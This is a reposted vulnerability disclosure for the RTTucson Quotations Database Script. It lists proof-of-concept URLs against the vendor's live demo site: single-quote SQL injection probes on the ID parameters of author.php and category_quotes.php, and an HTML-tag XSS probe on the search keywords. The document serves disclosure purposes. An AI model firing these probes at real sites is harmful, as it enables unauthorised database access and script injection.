Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

RTTucson Quotations Database Script Sql injection Vulnerability

$
0
0

##################################################################################
       __            _                      _            ____          
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ /
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /
                                                                /____/
##################################################################################                                                                                                                            
RTTucson Quotations Database Script, Multiple Vulnerabilities
Software Page: http://www.rttucson.com/index.html
Script Demo: http://www.rttucson.com/quotations/default.php

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site

[+] (author.php, ID Param)
>>> http://www.rttucson.com/quotations/author.php?ID=5' (MySQLi Found)

[+] (category_quotes.php, ID Param)
>>> http://www.rttucson.com/quotations/category_quotes.php?ID=9' (MySQLi Found)

>> (quote_search.php, keywords Param)
>>> http://www.rttucson.com/quotations/quote_search.php?keywords=<h1>Xssed-3spi0n</h1>





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information




Viewing all articles
Browse latest Browse all 8064

Trending Articles